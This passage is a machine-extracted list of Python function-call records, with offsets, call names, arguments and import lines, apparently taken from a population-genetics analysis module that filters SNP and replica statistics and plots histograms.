scenCond replicaTables replicaCond showHeadings showVals scen2sfxs\'\n )\n', (45645, 45748), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46337, 46362), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['replicaCond'], {}), '(replicaCond)\n', (46349, 46362), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46380, 46397), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showVals'], {}), '(showVals)\n', (46387, 46397), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((48625, 48652), 'Operations.IDotData.IDotData.fromFn', 'IDotData.fromFn', (['makeResult'], {}), '(makeResult)\n', (48640, 48652), False, 'from Operations.IDotData import IDotData\n'), ((49057, 49071), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (49069, 49071), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((49414, 49534), 'Operations.MiscUtil.dbg', 'dbg', (['""""findSnpsMatchingConds" scenCond snpTables snpCond replicaTables replicaCond showHeadings showVals scen2sfxs"""'], {}), '(\'"findSnpsMatchingConds" scenCond snpTables snpCond replicaTables replicaCond showHeadings showVals scen2sfxs\'\n )\n', (49417, 49534), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((49563, 49612), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx scenCond allScens scen2sfxs"""'], {}), "('Ddata thinSfx scenCond allScens scen2sfxs')\n", (49567, 49612), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50055, 50076), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['snpCond'], {}), '(snpCond)\n', (50067, 50076), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50094, 50111), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showVals'], {}), '(showVals)\n', (50101, 50111), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53279, 53306), 'Operations.IDotData.IDotData.fromFn', 'IDotData.fromFn', (['makeResult'], {}), '(makeResult)\n', (53294, 53306), False, 'from Operations.IDotData import IDotData\n'), ((53598, 53654), 'string.replace', 'string.replace', (['snpStatFN', '"""snpStats"""', '"""replicastats"""', '(1)'], {}), "(snpStatFN, 'snpStats', 'replicastats', 1)\n", (53612, 53654), False, 'import itertools, string\n'), ((53801, 53820), 'Operations.IDotData.IDotData', 'IDotData', (['snpStatFN'], {}), '(snpStatFN)\n', (53809, 53820), False, 'from Operations.IDotData import IDotData\n'), ((5986, 6105), 'os.path.join', 'os.path.join', (['Ddata', "('replicastats' + thinSfx)", 'scenDir', "(replicaTable + ('.tsv' if '.' not in replicaTable else ''))"], {}), "(Ddata, 'replicastats' + thinSfx, scenDir, replicaTable + (\n '.tsv' if '.' not in replicaTable else ''))\n", (5998, 6105), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((7327, 7344), 'Classes.DotData.DotData', 'DotData', ([], {'SVPath': 'f'}), '(SVPath=f)\n', (7334, 7344), False, 'from Classes.DotData import DotData\n'), ((7614, 7632), 'Operations.IDotData.IDotData', 'IDotData', ([], {'SVPath': 'f'}), '(SVPath=f)\n', (7622, 7632), False, 'from Operations.IDotData import IDotData\n'), ((13560, 13596), 'Operations.MiscUtil.ReplaceFileExt', 'ReplaceFileExt', (['histFiles[0]', '""".png"""'], {}), "(histFiles[0], '.png')\n", (13574, 13596), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((14149, 14176), 'matplotlib.pyplot.subplot', 'pp.subplot', (['(2)', '(1)', '(which + 1)'], {}), '(2, 1, which + 1)\n', (14159, 14176), True, 'import matplotlib.pyplot as pp\n'), ((14188, 14205), 'matplotlib.pyplot.xlabel', 'pp.xlabel', (['xlabel'], {}), '(xlabel)\n', (14197, 14205), True, 'import matplotlib.pyplot as pp\n'), ((14216, 14233), 'matplotlib.pyplot.ylabel', 'pp.ylabel', (['ylabel'], {}), '(ylabel)\n', (14225, 14233), True, 'import matplotlib.pyplot as pp\n'), ((14245, 14258), 'matplotlib.pyplot.hold', 'pp.hold', (['(True)'], {}), '(True)\n', (14252, 14258), True, 'import matplotlib.pyplot as pp\n'), ((16261, 16276), 'matplotlib.pyplot.title', 'pp.title', (['title'], {}), '(title)\n', (16269, 16276), True, 'import matplotlib.pyplot as pp\n'), ((17233, 17269), 'Operations.MiscUtil.ReplaceFileExt', 'ReplaceFileExt', (['histFiles[0]', '""".png"""'], {}), "(histFiles[0], '.png')\n", (17247, 17269), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((17974, 18001), 'Operations.MiscUtil.Histogrammer.load', 'Histogrammer.load', (['histFile'], {}), '(histFile)\n', (17991, 18001), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((18554, 18608), 'matplotlib.pyplot.plot', 'pp.plot', (['binLefts', 'binCounts'], {'label': 'label', 'color': 'color'}), '(binLefts, binCounts, label=label, color=color)\n', (18561, 18608), True, 'import matplotlib.pyplot as pp\n'), ((18900, 18970), 'matplotlib.pyplot.figlegend', 'pp.figlegend', ([], {'loc': '"""lower center"""', 'labels': 'theLabels', 'handles': 'theHandles'}), "(loc='lower center', labels=theLabels, handles=theHandles)\n", (18912, 18970), True, 'import matplotlib.pyplot as pp\n'), ((20992, 21016), 'os.path.dirname', 'os.path.dirname', (['outFile'], {}), '(outFile)\n', (21007, 21016), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((21030, 21058), 'os.path.join', 'os.path.join', (['Ddata', 'outFile'], {}), '(Ddata, outFile)\n', (21042, 21058), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((26771, 26785), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (26783, 26785), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((28781, 28805), 'os.path.dirname', 'os.path.dirname', (['outFile'], {}), '(outFile)\n', (28796, 28805), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((28819, 28847), 'os.path.join', 'os.path.join', (['Ddata', 'outFile'], {}), '(Ddata, outFile)\n', (28831, 28847), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((32803, 32831), 'os.path.dirname', 'os.path.dirname', (['condsFileFN'], {}), '(condsFileFN)\n', (32818, 32831), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((33333, 33350), 'Classes.DotData.DotData', 'DotData', ([], {'SVPath': 'f'}), '(SVPath=f)\n', (33340, 33350), False, 'from Classes.DotData import DotData\n'), ((33541, 33563), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (33560, 33563), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((33609, 33634), 'Operations.MiscUtil.compile_expr', 'compile_expr', (['replicaCond'], {}), '(replicaCond)\n', (33621, 33634), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((34015, 34038), 'itertools.izip', 'izip', (['*matchingReplicas'], {}), '(*matchingReplicas)\n', (34019, 34038), False, 'from itertools import izip\n'), ((35721, 35746), 'os.path.dirname', 'os.path.dirname', (['inFileFN'], {}), '(inFileFN)\n', (35736, 35746), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((35824, 35852), 'os.path.dirname', 'os.path.dirname', (['condsFileFN'], {}), '(condsFileFN)\n', (35839, 35852), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((35979, 36014), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['inFileFN', 'sfx', 'condName'], {}), '(inFileFN, sfx, condName)\n', (35989, 36014), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((37353, 37379), 'os.path.dirname', 'os.path.dirname', (['outFileFN'], {}), '(outFileFN)\n', (37368, 37379), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((37459, 37487), 'os.path.dirname', 'os.path.dirname', (['condsFileFN'], {}), '(condsFileFN)\n', (37474, 37487), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((37747, 37783), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFileFN', 'sfx', 'condName'], {}), '(outFileFN, sfx, condName)\n', (37757, 37783), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((39535, 39549), 'Operations.Shari_Operations.localize.Scenario.GetScenarios', 'GetScenarios', ([], {}), '()\n', (39547, 39549), False, 'from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios\n'), ((42268, 42326), 'matplotlib.pyplot.plot', 'pp.plot', (['[start, start + rng]', '[start, start + rng]', '"""g--"""'], {}), "([start, start + rng], [start, start + rng], 'g--')\n", (42275, 42326), True, 'import matplotlib.pyplot as pp\n'), ((42412, 42427), 'matplotlib.pyplot.title', 'pp.title', (['title'], {}), '(title)\n', (42420, 42427), True, 'import matplotlib.pyplot as pp\n'), ((43883, 43905), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (43902, 43905), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((48543, 48593), 'Operations.MiscUtil.dbg', 'dbg', (['"""numReplicasSkippedTot numReplicasAllowedTot"""'], {}), "('numReplicasSkippedTot numReplicasAllowedTot')\n", (48546, 48593), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53212, 53267), 'Operations.MiscUtil.dbg', 'dbg', (['""""finalCount" numSnpsSkippedTot numSnpsAllowedTot"""'], {}), '(\'"finalCount" numSnpsSkippedTot numSnpsAllowedTot\')\n', (53215, 53267), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53832, 53890), 'Operations.IDotData.IDotData.openForWrite', 'IDotData.openForWrite', (['replicaStatFN', 'snpStatFile.headings'], {}), '(replicaStatFN, snpStatFile.headings)\n', (53853, 53890), False, 'from Operations.IDotData import IDotData\n'), ((2643, 2805), 'Classes.DotData.DotData', 'DotData', ([], {'SVPath': 'posFileNames[replicaNum]', 'SVSkipFirstLines': '(1)', 'SVHeader': '(False)', 'names': "['SNP', 'CHROM', 'CHROM_POS', 'ALLELE1', 'FREQ1', 'ALLELE2', 'FREQ2']"}), "(SVPath=posFileNames[replicaNum], SVSkipFirstLines=1, SVHeader=False,\n names=['SNP', 'CHROM', 'CHROM_POS', 'ALLELE1', 'FREQ1', 'ALLELE2', 'FREQ2']\n )\n", (2650, 2805), False, 'from Classes.DotData import DotData\n'), ((6929, 6955), 'os.path.splitext', 'os.path.splitext', (['snpTable'], {}), '(snpTable)\n', (6945, 6955), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((7530, 7553), 'itertools.izip', 'izip', (['*replicaTableVals'], {}), '(*replicaTableVals)\n', (7534, 7553), False, 'from itertools import izip\n'), ((8212, 8271), 'Operations.MiscUtil.dbg', 'dbg', (['"""replica useThisReplica histogramBuilder.getNumVals()"""'], {}), "('replica useThisReplica histogramBuilder.getNumVals()')\n", (8215, 8271), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((16328, 16398), 'matplotlib.pyplot.figlegend', 'pp.figlegend', ([], {'loc': '"""lower center"""', 'labels': 'theLabels', 'handles': 'theHandles'}), "(loc='lower center', labels=theLabels, handles=theHandles)\n", (16340, 16398), True, 'import matplotlib.pyplot as pp\n'), ((26239, 26301), 'Operations.MiscUtil.Dict', 'Dict', (['"""snpStat replicaConds snpConds scenCond subplots_adjust"""'], {}), "('snpStat replicaConds snpConds scenCond subplots_adjust')\n", (26243, 26301), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((31839, 31878), 'Operations.MiscUtil.Dict', 'Dict', (['"""replicaStat sfx subplots_adjust"""'], {}), "('replicaStat sfx subplots_adjust')\n", (31843, 31878), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((33926, 33948), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (33945, 33948), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((34334, 34410), 'Operations.IDotData.IDotData', 'IDotData', ([], {'names': "(('replicaNum', 'matchingConds') + condNames)", 'Records': 'Records'}), "(names=('replicaNum', 'matchingConds') + condNames, Records=Records)\n", (34342, 34410), False, 'from Operations.IDotData import IDotData\n'), ((41961, 42006), 'Operations.MiscUtil.Dict', 'Dict', (['"""x y urls"""'], {'c': "(colors if colors else 'b')"}), "('x y urls', c=colors if colors else 'b')\n", (41965, 42006), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((43025, 43053), 'Operations.MiscUtil.DictGet', 'DictGet', (['scen2sfxs', 'scen', '""""""'], {}), "(scen2sfxs, scen, '')\n", (43032, 43053), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((44749, 44764), 'ast.parse', 'ast.parse', (['expr'], {}), '(expr)\n', (44758, 44764), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((45874, 45896), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['replicaTables'], {}), '(replicaTables)\n', (45881, 45896), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((46091, 46140), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx scenCond allScens scen2sfxs"""'], {}), "('Ddata thinSfx scenCond allScens scen2sfxs')\n", (46095, 46140), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((47024, 47072), 'logging.info', 'logging.info', (['""""findReplicasMatchingConds" scen"""'], {}), '(\'"findReplicasMatchingConds" scen\')\n', (47036, 47072), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((48356, 48419), 'Operations.MiscUtil.dbg', 'dbg', (['""""in_scenario" scen numReplicasSkipped numReplicasAllowed"""'], {}), '(\'"in_scenario" scen numReplicasSkipped numReplicasAllowed\')\n', (48359, 48419), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((49380, 49398), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['snpTables'], {}), '(snpTables)\n', (49387, 49398), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50433, 50469), 'Operations.MiscUtil.dbg', 'dbg', (['""""findSnpsMatchingConds" scen """'], {}), '(\'"findSnpsMatchingConds" scen \')\n', (50436, 50469), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((50898, 50946), 'Operations.MiscUtil.dbg', 'dbg', (['"""scen len(replicasHereSet) replicasHereSet"""'], {}), "('scen len(replicasHereSet) replicasHereSet')\n", (50901, 50946), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((51013, 51079), 'Operations.MiscUtil.dbg', 'dbg', (['"""#[ ( thisScenDict[ snpTable ] ) for snpTable in snpTables ]"""'], {}), "('#[ ( thisScenDict[ snpTable ] ) for snpTable in snpTables ]')\n", (51016, 51079), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((53153, 53200), 'Operations.MiscUtil.dbg', 'dbg', (['"""scen numSnpsSkippedTot numSnpsAllowedTot"""'], {}), "('scen numSnpsSkippedTot numSnpsAllowedTot')\n", (53156, 53200), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((4784, 4836), 'Operations.MiscUtil.Dict', 'Dict', (['"""scen Ddata simsOut thinSfx thinExt nreplicas"""'], {}), "('scen Ddata simsOut thinSfx thinExt nreplicas')\n", (4788, 4836), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7180, 7223), 'Operations.MiscUtil.Dict', 'Dict', (['"""scenDir snpCond replicaCond snpStat"""'], {}), "('scenDir snpCond replicaCond snpStat')\n", (7184, 7223), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((8077, 8095), 'numpy.isnan', 'np.isnan', (['r0.Chrom'], {}), '(r0.Chrom)\n', (8085, 8095), True, 'import numpy as np\n'), ((18198, 18246), 'Operations.MiscUtil.dbg', 'dbg', (['"""hist.binSize binSize hist.binSize-binSize"""'], {}), "('hist.binSize binSize hist.binSize-binSize')\n", (18201, 18246), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((18624, 18695), 'Classes.DotData.DotData', 'DotData', ([], {'names': "('binLefts', 'binCounts')", 'Columns': '(binLefts, binCounts)'}), "(names=('binLefts', 'binCounts'), Columns=(binLefts, binCounts))\n", (18631, 18695), False, 'from Classes.DotData import DotData\n'), ((18994, 19002), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (19000, 19002), True, 'import matplotlib.pyplot as pp\n'), ((19040, 19048), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (19046, 19048), True, 'import matplotlib.pyplot as pp\n'), ((29450, 29475), 'os.path.basename', 'os.path.basename', (['outFile'], {}), '(outFile)\n', (29466, 29475), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((29683, 29850), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata thinSfx replicaTables replicaCond replicaStat nreplicas binSize scenCond scen2sfxs allScens nameSfx sfx replicaCondSfx"""'], {'outFile': 'totaledHistFile'}), "(\n 'Ddata thinSfx replicaTables replicaCond replicaStat nreplicas binSize scenCond scen2sfxs allScens nameSfx sfx replicaCondSfx'\n , outFile=totaledHistFile)\n", (29687, 29850), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((31705, 31717), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (31708, 31717), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((33803, 33826), 'itertools.izip', 'izip', (['*replicaTableVals'], {}), '(*replicaTableVals)\n', (33807, 33826), False, 'from itertools import izip\n'), ((34858, 35111), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata scenario nreplicas thinSfx"""'], {'replicaTables': "('replicaStats',)", 'replicaConds': "(('all', 'True'), ('hi', 'replicaStats.causalAlleleFreq >= .5'), ('lo',\n 'replicaStats.causalAlleleFreq < .5'))", 'condsFileFN': '"""commonReplicaConds.tsv"""'}), "('Ddata scenario nreplicas thinSfx', replicaTables=('replicaStats',),\n replicaConds=(('all', 'True'), ('hi',\n 'replicaStats.causalAlleleFreq >= .5'), ('lo',\n 'replicaStats.causalAlleleFreq < .5')), condsFileFN=\n 'commonReplicaConds.tsv')\n", (34862, 35111), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((42052, 42060), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (42058, 42060), True, 'import matplotlib.pyplot as pp\n'), ((42098, 42106), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (42104, 42106), True, 'import matplotlib.pyplot as pp\n'), ((43099, 43113), 'Operations.MiscUtil.IsSeq', 'IsSeq', (['scenSfx'], {}), '(scenSfx)\n', (43104, 43113), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((45819, 45836), 'Operations.MiscUtil.MakeSeq', 'MakeSeq', (['showVals'], {}), '(showVals)\n', (45826, 45836), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((47231, 47267), 'Operations.IDotData.IDotData', 'IDotData', (['thisScenDict[replicaTable]'], {}), '(thisScenDict[replicaTable])\n', (47239, 47267), False, 'from Operations.IDotData import IDotData\n'), ((47963, 47980), 'Operations.MiscUtil.dbg', 'dbg', (['"""scen vdict"""'], {}), "('scen vdict')\n", (47966, 47980), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((51111, 51143), 'Operations.IDotData.IDotData', 'IDotData', (['thisScenDict[snpTable]'], {}), '(thisScenDict[snpTable])\n', (51119, 51143), False, 'from Operations.IDotData import IDotData\n'), ((54344, 54383), 'Operations.MiscUtil.Dict', 'Dict', (['"""Ddata scenario snpStatFN posCol"""'], {}), "('Ddata scenario snpStatFN posCol')\n", (54348, 54383), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7111, 7139), 'Operations.MiscUtil.AddFileSfx', 'AddFileSfx', (['outFile', '"""stats"""'], {}), "(outFile, 'stats')\n", (7121, 7139), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((7920, 7937), 'numpy.isnan', 'np.isnan', (['r.Chrom'], {}), '(r.Chrom)\n', (7928, 7937), True, 'import numpy as np\n'), ((10057, 10069), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (10060, 10069), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((11697, 11709), 'Operations.MiscUtil.Sfx', 'Sfx', (['nameSfx'], {}), '(nameSfx)\n', (11700, 11709), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((13690, 13709), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (13706, 13709), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((15822, 15844), 'Operations.MiscUtil.Dict', 'Dict', (['"""left color log"""'], {}), "('left color log')\n", (15826, 15844), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((16426, 16434), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (16432, 16434), True, 'import matplotlib.pyplot as pp\n'), ((16476, 16484), 'matplotlib.pyplot.gca', 'pp.gca', ([], {}), '()\n', (16482, 16484), True, 'import matplotlib.pyplot as pp\n'), ((17321, 17340), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (17337, 17340), False, 'import operator, os, logging, contextlib, functools, collections, types, ast\n'), ((26050, 26161), 'Operations.MiscUtil.Dict', 'Dict', (['"""xlabel ylabel title xbound ybound coarsenBy log outFile cumulative normed ticksCoarsen colors"""'], {}), "(\n 'xlabel ylabel title xbound ybound coarsenBy log outFile cumulative normed ticksCoarsen colors'\n )\n", (26054, 26161), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), ((31483, 31606), 'Operations.MiscUtil.Dict', 'Dict', (['"""xlabel ylabel title xbound ybound coarsenBy log outFile sfx ticksCoarsen cumulative normed cumulativeUpTo"""'], {}), "(\n 'xlabel ylabel title xbound ybound coarsenBy log outFile sfx ticksCoarsen cumulative normed cumulativeUpTo'\n )\n", (31487, 31606), False, 'from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff\n'), 